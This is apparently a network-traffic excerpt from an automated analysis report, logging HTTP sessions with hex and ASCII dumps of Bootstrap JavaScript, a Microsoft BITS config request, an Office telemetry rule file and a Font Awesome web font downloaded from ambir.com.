                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 63 2e 70 72 6f 70 28 22 74 79 70 65 22 29 26 26 28 63 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 29 21 3d 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 26 26 28 61 3d 21 31 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 63 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 61 26 26 63 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 65 6c 73 65 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 61
                                                                                                                                                                                              Data Ascii: element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("a
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 6f 70 74 69 6f 6e 73 3d 63 2c 74 68 69 73 2e 70 61 75 73 65 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 6c 69 64 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 24 61 63 74 69 76 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 24 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 62 6f 61 72 64 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6b 65 79 64 6f 77 6e 2c 74 68 69 73 29 29 2c 22 68 6f 76 65 72 22 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 75 73 65 26 26 21 28 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                              Data Ascii: options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentE
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 61 3c 30 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 65 28 22 73 6c 69 64 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 74 6f 28 61 29 7d 29 3a 63 3d 3d 61 3f 74 68 69 73 2e 70 61 75 73 65 28 29 2e 63 79 63 6c 65 28 29 3a 74 68 69 73 2e 73 6c 69 64 65 28 61 3e 63 3f 22 6e 65 78 74 22 3a 22 70 72 65 76 22 2c 74 68 69 73 2e 24 69 74 65 6d 73 2e 65 71 28 61 29 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7c 7c 28 74 68 69 73 2e 70 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 6e 65 78
                                                                                                                                                                                              Data Ascii: items.length-1||a<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".nex
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 63 74 69 76 65 22 2c 68 5d 2e 6a 6f 69 6e 28 22 20 22 29 29 2c 69 2e 73 6c 69 64 69 6e 67 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 6d 29 7d 2c 30 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 63 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 29 3a 28 65 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 66 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 74 68 69 73 2e 73 6c 69 64 69 6e 67 3d 21 31 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 6d 29 29 2c 67 26 26 74 68 69 73 2e 63 79 63 6c 65 28 29 2c 74 68 69 73 7d 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 63 61 72 6f
                                                                                                                                                                                              Data Ascii: ctive",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.caro
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 67 65 72 3d 61 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 5d 5b 68 72 65 66 3d 22 23 27 2b 62 2e 69 64 2b 27 22 5d 2c 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 5d 5b 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 27 2b 62 2e 69 64 2b 27 22 5d 27 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 65 6e 74 3f 74 68 69 73 2e 24 70 61 72 65 6e 74 3d 74 68 69 73 2e 67 65 74 50 61 72 65 6e 74 28 29 3a 74 68 69 73 2e 61 64 64 41 72 69 61 41 6e 64 43 6f 6c 6c 61 70 73 65 64 43 6c 61 73 73 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 24 74 72 69 67 67 65 72 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 6f 67 67 6c 65 26
                                                                                                                                                                                              Data Ascii: ger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 5b 30 5d 5b 69 5d 29 7d 7d 7d 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 68 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 69 6e 22 29 29 7b 76 61 72 20 62 3d 61 2e 45 76 65 6e 74 28 22 68 69 64 65 2e 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 3b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 62 29 2c 21 62 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 64 69 6d 65 6e 73 69 6f 6e 28 29 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 63 5d 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 63 5d 28 29 29 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68
                                                                                                                                                                                              Data Ascii: [0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeigh
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 65 3d 61 28 74 68 69 73 29 3b 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 7c 7c 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 66 3d 62 28 65 29 2c 67 3d 66 2e 64 61 74 61 28 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 2c 68 3d 67 3f 22 74 6f 67 67 6c 65 22 3a 65 2e 64 61 74 61 28 29 3b 63 2e 63 61 6c 6c 28 66 2c 68 29 7d 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61 72 20 63 3d 62 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 63 7c 7c 28 63 3d 62 2e 61 74 74 72 28 22 68 72 65 66 22 29 2c 63 3d 63 26 26 2f 23 5b 41 2d 5a 61 2d 7a
                                                                                                                                                                                              Data Ascii: "]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              15192.168.2.5497302.16.229.162443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:17 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                              2024-11-20 20:28:18 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                              Server: ECAcc (lpl/EF17)
                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                                              Cache-Control: public, max-age=245849
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:17 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              16192.168.2.54973613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                              x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202818Z-r1d97b99577lxltfhC1TEByw2s00000009e0000000009cat
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:18 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              17192.168.2.549738141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC685OUTGET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                              Referer: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.css
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:19 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                              Content-Length: 78196
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 15:42:06 GMT
                                                                                                                                                                                              ETag: "673e034e-13174"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13780
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f899f6ac434-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:19 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 01 31 74 00 0d 00 00 00 03 17 f4 00 01 31 1a 01 4b 85 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 99 4e 11 08 0a 8a e6 68 88 c3 42 01 36 02 24 03 9f 30 0b 9f 34 00 04 20 05 8a 2b 07 e2 2e 5b b4 75 92 81 70 d3 28 e4 d7 9b 55 15 64 81 f0 7b 2d 98 6e ee 50 6e 1b c0 c9 9f e1 5f 3d 56 32 b6 65 04 ef 76 70 d8 7e 97 ab c8 fe ff ff ff 7f 55 b2 90 31 fd bf c0 3d 09 1f 42 c0 82 62 ad ae b2 95 6d 76 53 b4 2e c6 94 ac 77 c9 43 19 2b e8 24 99 b8 a4 28 fd a0 4d 4d 49 e6 69 48 7d aa 93 4f e5 04 eb 34 c0 37 15 73 ce 12 17 59 81 29 02 2a 02 2a 02 ca d9 dd 7d ec 95 07 5e da b4 89 bb 7b 5e a1 b7 f2 aa 52 0a 7a df d0 0a 8d 66 c8 8c 06 68 34 64 44 37 eb 3a 31 2a 9a 99 18 43 6a 83 1f 6c cd 38 4d a5
                                                                                                                                                                                              Data Ascii: wOF21t1K?FFTM`NhB6$04 +.[up(Ud{-nPn_=V2evp~U1=BbmvS.wC+$(MMIiH}O47sY)**}^{^Rzfh4dD7:1*Cjl8M
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 91 ac 40 c1 ac c0 85 10 94 f0 a2 6c 3d 84 e5 67 00 83 1b 2d 14 c3 43 38 f4 02 80 42 d5 58 e8 7f 00 81 80 f7 af fe ec 67 9e 7e 9c 91 70 b3 31 25 ec 1b 78 a8 41 c8 58 d5 1e 8e 0f 45 73 a7 9d f9 e5 d3 13 c1 66 13 e4 4d 21 01 1b 7e 0a 65 fc 2b 4d fd ba cb b7 ee dd fc ba 7b 30 a3 f0 ed c5 64 52 74 50 a4 e2 8f 19 18 88 9e 0b 29 d8 1f 9b 79 d0 e1 02 5c 81 dd 1b c2 04 06 ed d7 4c a6 48 25 4a 14 39 41 c1 29 28 20 38 6c 92 e5 b2 76 f3 bd 36 7b 47 ed 4c 7b c0 f6 b1 e1 80 4c 74 b0 e7 0f 2c 08 b1 ab bc 2b da dd 56 93 df 05 11 56 52 80 ba 94 b9 5a d3 dd 00 1b 91 14 75 d9 de 7f 51 d8 56 7d 84 a9 d0 7b 09 8f af 05 e4 bd 0b 91 b0 45 74 0d d3 c1 3e 4c 39 d8 01 ff 85 00 fd c7 fd f6 4b f1 34 7c 0f f1 06 5f 42 21 a4 89 3d bb 33 2c 04 62 80 01 1c 0c b9 53 49 4d 53 fa 9e 65 2c
                                                                                                                                                                                              Data Ascii: @l=g-C8BXg~p1%xAXEsfM!~e+M{0dRtP)y\LH%J9A)( 8lv6{GL{Lt,+VVRZuQV}{Et>L9K4|_B!=3,bSIMSe,
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 07 69 fd 04 05 9e 96 56 09 a7 ae c2 3b 4a b1 8b d9 69 3d 94 92 4a 71 6e 37 b6 bf 79 3b b1 ac 72 5e f4 39 e4 73 9c 94 ff b9 a8 5c ff 79 c1 67 c7 e7 85 9f 97 d0 1b c0 97 0f 7c 3e fa f9 e4 e7 f3 9f 2f 83 d8 17 3f 5f fb 3c 31 fb e0 f3 4f c2 3f 5f e0 90 82 de cc df 9e ff a5 f5 cb 22 ee e6 1f 4d 17 f0 7f de 05 de 01 de 36 24 39 97 5e 36 b2 96 95 74 d2 ca 42 e6 32 93 28 b5 4c c4 cb 58 9c 58 31 32 14 25 67 02 27 be fe ae f3 ff fb 72 d8 ef d6 f3 c9 78 34 6c b7 9a 8d 7a ad 5a 2e 15 69 12 47 e1 93 e5 70 d0 ef 75 f2 b9 6c 32 1a ba df ae 97 e3 62 3e 9b 8c ea b5 4a 3e 97 88 86 7f 29 57 26 4d aa 64 89 a2 c2 42 02 3a 29 55 22 12 4c fc 7f 7d 3e 0e 7d 5b 17 59 12 b8 16 b8 a8 68 8a c0 bf 1c 6c 16 07 ae c5 29 2c a4 b3 fd b2 69 97 bd fe bf cf fb f9 b8 5d 2f e7 d3 7e bb 59 cd
                                                                                                                                                                                              Data Ascii: iV;Ji=Jqn7y;r^9s\yg|>/?_<1O?_"M6$9^6tB2(LXX12%g'rx4lzZ.iGpul2b>J>)W&MdB:)U"L}>}[Yhl),i]/~Y
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 70 8c 6f 1e b5 c4 94 5c e8 cb c2 3c 99 b8 95 5d 4b 50 2c 20 ae 27 ac ba 42 a1 5a 05 80 e6 bd c8 f9 d9 54 d5 3d 9a 6b 6b cc b0 28 7c d6 ca 1f b4 df 68 b4 9f b1 1c a5 26 aa 95 17 e7 b4 f6 8d d1 19 66 e4 6c 44 b1 99 6e fd 97 eb 7e f5 6e 65 9b f6 6c ff 76 b0 b6 a8 80 09 c1 28 32 75 a1 bd 6a 82 17 04 e2 a6 9e 0c 87 37 d6 a6 c9 ac 1f 97 f8 73 22 56 97 52 b7 16 63 79 51 55 11 9f 10 24 a5 c5 e2 ae bf 9b 9c 78 50 2a 7f 5a c5 4c 76 79 cd 8c 13 f7 7c cb 9a eb 86 c3 6e cd 91 2b 2e f0 31 60 d6 0f ea 09 f9 51 f4 49 78 b9 02 34 4a 3d 7e 7c 65 ab cb 7b af c5 c7 b3 b8 ec f2 50 a0 02 57 f4 f6 c3 e5 f9 67 d7 4a a9 cb d9 35 cc 7b d5 ba bc 70 96 af 54 1a 83 9d 9b 5a 2b 1d 11 41 3c 70 b0 2e 7c a8 ca 4c 61 f6 16 76 43 24 56 6b 1f a1 89 8a 08 3d d4 ea de 85 18 7a 7b 1d 2b e0 f2
                                                                                                                                                                                              Data Ascii: po\<]KP, 'BZT=kk(|h&flDn~nelv(2uj7s"VRcyQU$xP*ZLvy|n+.1`QIx4J=~|e{PWgJ5{pTZ+A<p.|LavC$Vk=z{+
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: e4 ed e4 99 60 f4 38 e7 69 96 a8 37 c0 e1 24 06 5e 82 90 96 9f 15 93 ba 83 31 b1 c8 46 25 31 46 c2 9c 00 d1 c4 b4 3e c6 ba 4a 32 d7 1c 8d e1 33 ae 5b 59 6d 5e f7 4c 12 b1 5d ca 72 6c 07 a7 09 c3 b0 57 dd 3a 3a 4c 4b 8c 13 04 fb 4c a1 39 ab 03 b8 73 b7 30 2d d0 5f 54 98 23 e6 bd a3 5c 5b 04 7a 84 74 60 0d 08 cd 7e 64 bf 99 d0 d4 c7 28 01 e5 cd 63 ea e9 8d ca 0b 45 ca 37 1c 46 2c aa cc 43 89 1d ae 4b 2e a7 53 69 a9 96 e4 8b 8f ed 77 53 5b 0d 65 7c 17 fd 2c 93 28 84 14 a5 d3 a8 b8 a3 b2 e6 32 92 cc bc 83 df 39 63 73 64 4f ac 88 6d 6b 60 f7 4c 9d 13 54 ee 4b ba c0 4d 26 5d 7c 28 44 81 4c e6 70 30 c0 0b a6 ab 54 65 89 d8 e4 90 d9 62 1f 8b f0 e7 d3 9e 14 d2 75 9c 92 19 df ac 2e a0 c6 bc 16 65 08 74 bf 7c b2 90 b7 e7 05 03 a7 68 b1 87 80 27 27 f9 d3 0a c2 81 d4
                                                                                                                                                                                              Data Ascii: `8i7$^1F%1F>J23[Ym^L]rlW::LKL9s0-_T#\[zt`~d(cE7F,CK.SiwS[e|,(29csdOmk`LTKM&]|(DLp0Tebu.et|h''
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 94 28 99 71 e3 65 a3 c7 bb 45 c8 f5 a0 21 29 a5 f6 c4 6e 2f d1 62 2d 84 dc fb 2c 96 84 2b 20 dc a9 f2 92 b5 69 6f 98 5a f6 76 33 41 b2 77 a7 b4 e9 65 9a 58 29 41 fe 72 32 f7 a4 30 b8 bb 70 3b 37 5e d4 93 0a e1 8d c2 f5 2c e4 69 b1 90 f2 d3 da da 66 8b 90 86 79 2f a4 cc 40 b9 af 1c 42 52 cd 6e 60 94 38 e7 e1 c7 3a ba 08 bf 1d 23 69 c7 ea 52 b6 a4 e0 a3 1b 1a cc 5b 4a 04 4a d3 a9 4f ae 8a 8a 7e 89 5c fc 9e 62 44 7f 5e 0c 8c a0 c2 6b 92 ec ed 7a 95 be 49 1d 74 74 da 69 34 ef c5 fd 03 37 f6 60 b8 17 46 64 c5 1e 87 41 fd 06 f3 e5 86 f7 52 04 60 42 37 60 c3 a7 20 8d a6 86 2d e2 26 44 3e ad 6f 19 31 aa b7 92 ba 5a ac 6d 75 f9 3d fd 07 b9 d5 f6 75 fd 8d d2 ea d2 87 fa f7 8b a4 78 0d 74 d3 6d f7 8a 45 5f 26 62 09 e3 cb 44 e7 c9 21 4d 04 47 b7 59 b0 29 17 ce 82 25
                                                                                                                                                                                              Data Ascii: (qeE!)n/b-,+ ioZv3AweX)Ar20p;7^,ify/@BRn`8:#iR[JJO~\bD^kzItti47`FdAR`B7` -&D>o1Zmu=uxtmE_&bD!MGY)%
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: b8 33 c3 42 66 bc 5c 82 77 bc 29 be 64 26 12 da 20 90 24 df a1 7a 32 67 ca 63 d9 0f fc 8e 7f b8 48 34 2d 42 da 2d 75 17 0f 8b 2a 7b 8c c0 a3 be ab fe f2 3d 86 63 89 7d 08 0c f3 26 26 c4 88 ea 5d 46 d9 44 56 96 d2 a1 9b 3a 94 f1 85 0b a9 eb e5 f9 5e 2c 5d 25 91 18 a2 c3 01 6a fc d4 fa 88 59 3a 82 3c d4 b8 ab 99 04 13 c1 24 55 b1 1b 28 f4 52 f8 4d b0 89 1d 52 ab 8f 79 fe 93 56 26 45 99 3c 17 8b 02 2e e8 aa 08 67 04 f3 76 37 27 18 81 c2 10 cf 85 29 97 47 d8 bb 42 43 01 13 d2 b6 c1 a9 73 9c f5 82 b0 86 76 95 eb ca d9 95 32 75 d7 cf 74 b7 b0 c4 e6 9f 1d 4b fe 85 0f aa e7 ba 21 51 06 0a 80 a8 69 42 df a7 12 d5 66 b7 bd a6 b6 d8 dd 42 c6 bb 79 cb 29 bc f6 24 93 96 5d 7c 5c ce 57 7c fe e1 14 2a 9b 39 f8 a8 c4 44 cf a5 6e 0d 9b ff 11 fe e4 fd c9 cf 5e fc eb dc 99
                                                                                                                                                                                              Data Ascii: 3Bf\w)d& $z2gcH4-B-u*{=c}&&]FDV:^,]%jY:<$U(RMRyV&E<.gv7')GBCsv2utK!QiBfBy)$]|\W|*9Dn^
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 51 1b e9 78 49 bc fc a3 ca 17 92 49 8b da 95 14 07 64 fd 45 5c 94 5d e1 ad ab 68 c8 33 5b d4 24 33 5a cc 7d 71 21 1b 66 b0 60 72 50 ac 65 f2 6b 22 c0 32 68 b8 e4 8c b2 f0 00 e8 e9 3d bb 6d a9 b0 cd d6 c6 88 89 84 63 3c c1 66 e9 4c bc 94 c7 b2 97 05 e6 f7 47 5d a0 5c 85 a8 aa 46 65 ee e6 b3 8e cd 63 66 94 41 fd e8 28 bf 99 33 6e d2 e2 57 d0 41 55 45 71 59 a1 34 9f 02 ed 82 92 a2 15 f1 09 c5 f0 22 be 77 5c 93 91 f0 a3 66 93 26 19 09 a3 e2 35 43 5e 9c 70 88 46 3c cc cb 49 52 46 b2 d2 b4 14 5c 84 c4 cc 84 49 12 8c 23 d2 b4 b0 27 ba 67 db d0 8c 86 83 a6 49 3d 9a 33 53 5a 4d db bb af dc 75 4f a5 f6 5c 72 ad 89 0c 7b 3c 64 1d c0 c9 fd da a2 75 10 1d 50 51 43 f6 66 d5 0b 83 9e 0e af 43 5b bd d7 7e 30 13 e6 8a 61 19 17 ed 89 55 66 b3 49 d1 4e 0e 63 27 00 13 82 84
                                                                                                                                                                                              Data Ascii: QxIIdE\]h3[$3Z}q!f`rPek"2h=mc<fLG]\FecfA(3nWAUEqY4"w\f&5C^pF<IRF\I#'gI=3SZMuO\r{<duPQCfC[~0aUfINc'
